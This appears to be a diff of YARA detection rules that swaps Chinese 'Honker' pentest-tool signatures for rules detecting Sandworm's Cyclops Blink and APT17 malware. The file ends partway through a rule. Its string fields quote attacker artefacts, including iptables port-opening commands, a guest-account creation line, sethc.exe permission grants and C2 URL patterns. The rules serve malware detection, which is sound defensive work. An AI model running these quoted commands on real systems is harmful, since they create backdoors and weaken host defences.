+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Notable_Strings : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
-		date = "2015-06-23"
+		description = "Detects notable strings identified within the Cyclops Blink executable"
+		author = "NCSC"
+		id = "81ccf582-41f5-5fe5-8afc-e008e01289ff"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1373-L1390"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L6-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
-		logic_hash = "8f33f2999eae3f080e8e5ec51ced3e7d596a07b6e5c9830cc1ca552701ed6502"
-		score = 70
+		logic_hash = "fdd3a1de9d178370fcc66dbca4628d7bedfbc002bca9e463e11cb444302900ea"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s0 = "cmd.dll" fullword wide
-		$s1 = "cmdpath" fullword ascii
-		$s2 = "Get4Bytes" fullword ascii
-		$s3 = "ExcuteCmd" fullword ascii
+		$proc_name1 = "[kworker/0:1]"
+		$proc_name2 = "[kworker/1:1]"
+		$dns_query = "POST /dns-query HTTP/1.1\x0d\x0aHost: dns.google\x0d\x0a"
+		$iptables1 = "iptables -I %s -p tcp --dport %d -j ACCEPT &>/dev/null"
+		$iptables2 = "iptables -D %s -p tcp --dport %d -j ACCEPT &>/dev/null"
+		$sys_recon1 = "{\"ver\":\"%x\",\"mods\";["
+		$sys_recon2 = "uptime: %lu mem_size: %lu mem_free: %lu"
+		$sys_recon3 = "disk_size: %lu disk_free: %lu"
+		$sys_recon4 = "hw: %02x:%02x:%02x:%02x:%02x:%02x"
+		$testpath = "%s/214688dsf46"
+		$confpath = "%s/rootfs_cfg"
+		$downpath = "/var/tmp/a.tmp"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
+		( uint32( 0 ) == 0x464c457f ) and ( 8 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Ms11046 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Module_Initialisation : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms11046.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "aafb45f4-3b42-5c8f-8c25-40fd01217e9d"
-		date = "2015-06-23"
+		description = "Detects the code bytes used to initialise the modules built into Cyclops Blink"
+		author = "NCSC"
+		id = "c81b92c4-3f70-5bbd-acfa-ed1e1d33461d"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1392-L1409"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L39-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
-		logic_hash = "0496e5c062c1a248b118c2f6009c95bfddf753e5491529d4ec43cfaf1ea0c0c5"
-		score = 70
+		logic_hash = "8bde37f642cf07e323beabaacd5c62f8422b451777fc1fc4a6bdf474db49de12"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s0 = "[*] Token system command" fullword ascii
-		$s1 = "[*] command add user 90sec 90sec" fullword ascii
-		$s2 = "[*] Add to Administrators success" fullword ascii
-		$s3 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$ = {94 21 FF F0 93 E1 00 08 7C 3F 0B 78 38 00 00 ?? 7C 03
+      03 78 81 61 00 00 8E EB FF F8 7D 61 5B 78 4E 80 00 20}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		( uint32( 0 ) == 0x464c457f ) and ( any of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Master_Beta_1_7 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Modified_Install_Upgrade : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
-		date = "2015-06-23"
+		description = "Detects notable strings identified within the modified install_upgrade executable, embedded within Cyclops Blink"
+		author = "NCSC"
+		id = "4c4f7262-df74-5f6a-afc0-df1fcae4741c"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1411-L1426"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L57-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
-		logic_hash = "13c9cc0bf8aaed2ba86baeee6f0b32bf71108dc1350dcffd03e70393fa975c9f"
-		score = 70
+		logic_hash = "69b89dbaf3e2661f376ff1be7c19e96c82bf84fd572fea422c109f8afdd1e5aa"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
+		hash3 = "7d61c0dd0cd901221a9dff9df09bb90810754f10"
+		hash4 = "438cd40caca70cafe5ca436b36ef7d3a6321e858"
 
 	strings:
-		$s1 = "http://seo.chinaz.com/?host=" fullword ascii
-		$s2 = "Location: getpass.asp?info=" fullword ascii
+		$ = "/pending/%010lu_%06d_%03d_p1"
+		$ = "/pending/sysa_code_dir/test_%d_%d_%d_%d_%d_%d"
+		$ = "etaonrishdlcupfm"
+		$ = "/pending/WGUpgrade-dl.new"
+		$ = "/pending/bin/install_upgraded"
+		$ = {38 80 4C 00}
+		$ = {38 80 4C 05}
+		$ = {38 80 4C 04}
+		$ = {3C 00 48 4D 60 00 41 43 90 09 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 312KB and all of them
+		( uint32( 0 ) == 0x464c457f ) and ( 6 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_2 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Core_Command_Check : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
-		date = "2015-06-23"
+		description = "Detects the code bytes used to test the command ID being sent to the core component of Cyclops Blink"
+		author = "NCSC"
+		id = "46066474-7647-52fb-b40d-30ff8e285b6e"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1428-L1446"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L90-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0783661077312753802bd64bf5d35c4666ad0a82"
-		logic_hash = "85c73d480019929eef5951b0395f49cea86dc83b334860e940cc6e36c2d96d3a"
-		score = 70
+		logic_hash = "71c9da1f0e9e64be87293c985f2a4a59a6c87ffd127ce5104ebe95a0ccb316af"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "F4ck.exe" fullword wide
-		$s2 = "@Netapi32.dll" fullword ascii
-		$s3 = "Team.F4ck.Net" fullword wide
-		$s8 = "Administrators" fullword ascii
-		$s9 = "F4ck Team" fullword wide
+		$cmd_check = {81 3F 00 18 88 09 00 05 54 00 06 3E 2F 80 00 (07|0A|0B|0C|0D) }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 5 )
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_80_Antifw : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Config_Identifiers : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file AntiFW.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "761bed41-e8e6-585b-8fde-a6b6a56445d6"
-		date = "2015-06-23"
+		description = "Detects the initial characters used to identify Cyclops Blink configuration data"
+		author = "NCSC"
+		id = "db5b3a4a-82c2-500a-88f6-340b3392eac8"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1448-L1466"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L106-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5fbc75900e48f83d0e3592ea9fa4b70da72ccaa3"
-		logic_hash = "5e940406b713458ae7168d4e140f15a262b7f0834d29db9c88f1f04bedb41e43"
-		score = 70
+		logic_hash = "6fa39442d717a69dd6f31a4bb2e5865c3f16156ce24a2b419d95ed751bb0d8ee"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "Set TS to port:80 Successfully!" fullword ascii
-		$s2 = "Now,set TS to port 80" fullword ascii
-		$s3 = "echo. >>amethyst.reg" fullword ascii
-		$s4 = "del amethyst.reg" fullword ascii
-		$s5 = "AntiFW.cpp" fullword ascii
+		$ = {3C 00 3C 6B 60 00 3A 20 90 09 00 00}
+		$ = {3C 00 3C 63 60 00 3A 20 90 09 00 00}
+		$ = {3C 00 3C 73 60 00 3A 20 90 09 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of them
+		( uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Wwwscan_Gui : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0Xf_Command : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wwwscan_gui.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fffed806-4394-505a-96bd-50bf6f24aefc"
-		date = "2015-06-23"
+		description = "Detects the code bytes used to check module ID 0xf control flags and a format string used for file content upload"
+		author = "NCSC"
+		id = "36646b7a-389d-5fd9-88a1-e43e7224763a"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1468-L1483"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L128-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
-		logic_hash = "9c25cf33fc2f675c8db7b24f2abe03d54c0ae17927e0ca9ccd3e5b97ffc56f73"
-		score = 70
+		logic_hash = "6e3eebe404c8cd24e1e16eb3c881b1eda78ba6b365bf89c2557329e6f89396ac"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
-		$s2 = "/eye2007Admin_login.aspx" fullword ascii
+		$ = {54 00 06 3E 54 00 07 FE 54 00 06 3E 2F 80 00 00}
+		$ = {54 00 06 3E 54 00 07 BC 2F 80 00 00}
+		$ = {54 00 06 3E 54 00 07 7A 2F 80 00 00}
+		$ = {54 00 06 3E 54 00 06 F6 2F 80 00 00}
+		$ = "file:%s\n" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 280KB and all of them
+		( uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Swordcolledition : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Default_Config_Values : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SwordCollEdition.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4e8d4d48-c053-5579-be9c-af73ec0fe614"
-		date = "2015-06-23"
+		description = "Detects the code bytes used to set default Cyclops Blink configuration values"
+		author = "NCSC"
+		id = "04067609-1173-51f2-907f-2a236aae6c7c"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1485-L1500"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L152-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6e14f21cac6e2aa7535e45d81e8d1f6913fd6e8b"
-		logic_hash = "bbc5c9bb91bdd60582e2d7f6fa9b1a1cc3799e0809b670d575d9b2c77bf5e884"
-		score = 70
+		logic_hash = "180993057c110c0c0327b673c6d6e251534012de51cf6475838691e0942a1aa8"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s0 = "YuJianScan.exe" fullword wide
-		$s1 = "YuJianScan" fullword ascii
+		$ = {38 00 00 19 90 09 01 A4}
+		$ = {3C 00 00 01 60 00 80 00 90 09 01 A8}
+		$ = {38 00 40 00 90 09 01 AC}
+		$ = {38 00 01 0B 90 09 01 B0}
+		$ = {38 00 27 11 90 09 01 C0}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 225KB and all of them
+		( uint32( 0 ) == 0x464c457f ) and ( 3 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Hconstfportable : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Cyclopsblink_Handle_Mod_0X51_Command : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
-		date = "2015-06-23"
+		description = "Detects the code bytes used to check commands sent to module ID 0x51 and notable strings relating to the Cyclops Blink update process"
+		author = "NCSC"
+		id = "a6800aed-27dc-5d01-b005-1eb4a62344a3"
+		date = "2022-02-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1502-L1517"
+		reference = "https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sandworm_cyclops_blink.yar#L176-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
-		logic_hash = "d4368994d38b87a4c0a53321a468fa8a72411ccb17befa0bbc62bdd6de9e1a52"
-		score = 70
+		logic_hash = "8a68f4a5f5b7a45819e9a198881aa41b75a65181b63788c8b824b339bfd6fc67"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3adf9a59743bc5d8399f67cab5eb2daf28b9b863"
+		hash2 = "c59bc17659daca1b1ce65b6af077f86a648ad8a8"
 
 	strings:
-		$s1 = "HconSTFportable.exe" fullword wide
-		$s2 = "www.Hcon.in" fullword wide
+		$cmd_check = {88 1F [2] 54 00 06 3E 2F 80 00 (01|02|03) }
+		$path1 = "/etc/wg/configd-hash.xml"
+		$path2 = "/etc/wg/config.xml"
+		$mnt_arg1 = "ext2"
+		$mnt_arg2 = "errors=continue"
+		$mnt_arg3 = {38 C0 0C 20}
+		$mnt_arg4 = {38 C0 0C 21}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 354KB and all of them
+		( uint32( 0 ) == 0x464c457f ) and ( #cmd_check == 3 ) and ( ( @cmd_check [ 3 ] - @cmd_check [ 1 ] ) < 0x200 ) and ( all of ( $path* ) ) and ( all of ( $mnt_arg* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_LPK : FILE
+rule SIGNATURE_BASE_APT17_Malware_Oct17_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
+		description = "Detects APT17 malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5b806d9-74dc-5244-b1e0-9837abeaeaac"
-		date = "2015-06-23"
+		id = "457312d8-5bfe-5282-9ace-2f169278569c"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1519-L1536"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
-		logic_hash = "20e949bef1c1631ef2a48c78c2ccc4dcea2f842275ec5df3e31c5d915e8a2a04"
-		score = 70
+		logic_hash = "0c4391b47df0c40dbd605515992e5eaa758d0e509e9ad24b517d104b8e7d504c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83"
 
 	strings:
-		$s1 = "FreeHostKillexe.exe" fullword ascii
-		$s2 = "\\sethc.exe /G everyone:F" ascii
-		$s3 = "c:\\1.exe" fullword ascii
-		$s4 = "Set user Group Error! Username:" fullword ascii
+		$s1 = "\\spool\\prtprocs\\w32x86\\localspl.dll" ascii
+		$s2 = "\\spool\\prtprocs\\x64\\localspl.dll" ascii
+		$s3 = "\\msvcrt.dll" ascii
+		$s4 = "\\TSMSISrv.dll" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Without_A_Trace_Wywz : FILE
+
+rule SIGNATURE_BASE_APT17_Malware_Oct17_2 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Wywz.exe"
+		description = "Detects APT17 malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1093c0c3-499f-5aec-ad4a-878d377296d5"
-		date = "2015-06-23"
+		id = "9f21514a-168b-5158-8322-60fa8499b11a"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1538-L1554"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L31-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f443c43fde643228ee95def5c8ed3171f16daad8"
-		logic_hash = "0f6ca7d44312afef49d3094af7b33af5e41f4531e7e7f9f37cf050700755bb3e"
-		score = 70
+		logic_hash = "378a21edeaf36267986bd5158fe736b0970b0b9f0ad824f09dc6434a9ba1d7e2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "20cd49fd0f244944a8f5ba1d7656af3026e67d170133c1b3546c8b2de38d4f27"
 
 	strings:
-		$s1 = "\\Symantec\\Norton Personal Firewall\\Log\\Content.log" ascii
-		$s2 = "UpdateFile=d:\\tool\\config.ini,Option\\\\proxyIp=127.0.0.1\\r\\nproxyPort=808" ascii
-		$s3 = "%s\\subinacl.exe /subkeyreg \"%s\" /Grant=%s=f /Grant=everyone=f" fullword ascii
+		$x1 = "Cookie: __xsptplus=%s" fullword ascii
+		$x2 = "http://services.fiveemotions.co.jp" fullword ascii
+		$x3 = "http://%s/ja-JP/2015/%d/%d/%d%d%d%d%d%d%d%d.gif" fullword ascii
+		$s1 = "FoxHTTPClient_EXE_x86.exe" fullword ascii
+		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3072" ascii
+		$s3 = "hWritePipe2 Error:%d" fullword ascii
+		$s4 = "Not Support This Function!" fullword ascii
+		$s5 = "Global\\PnP_No_Management" fullword ascii
+		$s6 = "Content-Type: image/x-png" fullword ascii
+		$s7 = "Accept-Language: ja-JP" fullword ascii
+		$s8 = "IISCMD Error:%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1800KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.exports ( "_foo@0" ) or 1 of ( $x* ) or 6 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_LPK2_0_LPK : FILE
+
+rule SIGNATURE_BASE_APT17_Unsigned_Symantec_Binary_EFA : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
+		description = "Detects APT17 malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
-		date = "2015-06-23"
+		id = "56eec517-8b00-5cb5-9806-249e50f53b99"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1556-L1573"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L61-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
-		logic_hash = "d693b880d5419277d9189d44ace60fe5f328b4662c1975a8bc97e63dc073d1e6"
-		score = 70
+		logic_hash = "7306c8ae2be4dbf56957e11d78ba85bcfa1c8570ba41f749ea5b0e2a05e9df7b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f"
 
 	strings:
-		$s1 = "\\sethc.exe /G everyone:F" ascii
-		$s2 = "net1 user guest guest123!@#" fullword ascii
-		$s3 = "\\dllcache\\sethc.exe" ascii
-		$s4 = "sathc.exe 211" fullword ascii
+		$s1 = "Copyright (c) 2007 - 2011 Symantec Corporation" fullword wide
+		$s2 = "\\\\.\\SYMEFA" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1030KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.number_of_signatures == 0 )
 }
-rule SIGNATURE_BASE_CN_Honker_Cleaniis : FILE
+
+rule SIGNATURE_BASE_APT17_Malware_Oct17_Gen : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file cleaniis.exe"
+		description = "Detects APT17 malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "75f3c33a-e3b8-57bc-a3fd-f8b6491388d8"
-		date = "2015-06-23"
+		id = "c2156e68-d5b5-5bd7-858c-2d5e90199287"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1575-L1590"
+		reference = "https://goo.gl/puVc9q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L77-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "372bc64c842f6ff0d9a1aa2a2a44659d8b88cb40"
-		logic_hash = "6f3fe22c9ce8b576116a3fc185910488f37b687c1158d49a93feaa68a144a8db"
-		score = 70
+		logic_hash = "3e0e4a989a907f5f1aaac4ba43611dd0d2e4b4fd340234f04b3fce25843f9dc6"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2"
+		hash2 = "07f93e49c7015b68e2542fc591ad2b4a1bc01349f79d48db67c53938ad4b525d"
+		hash3 = "ee362a8161bd442073775363bf5fa1305abac2ce39b903d63df0d7121ba60550"
 
 	strings:
-		$s1 = "iisantidote <logfile dir> <ip or string to hide>" fullword ascii
-		$s4 = "IIS log file cleaner by Scurt" fullword ascii
+		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)" fullword ascii
+		$x2 = "http://%s/imgres?q=A380&hl=en-US&sa=X&biw=1440&bih=809&tbm=isus&tbnid=aLW4-J8Q1lmYBM" ascii
+		$s1 = "hWritePipe2 Error:%d" fullword ascii
+		$s2 = "Not Support This Function!" fullword ascii
+		$s3 = "Cookie: SESSIONID=%s" fullword ascii
+		$s4 = "http://0.0.0.0/1" fullword ascii
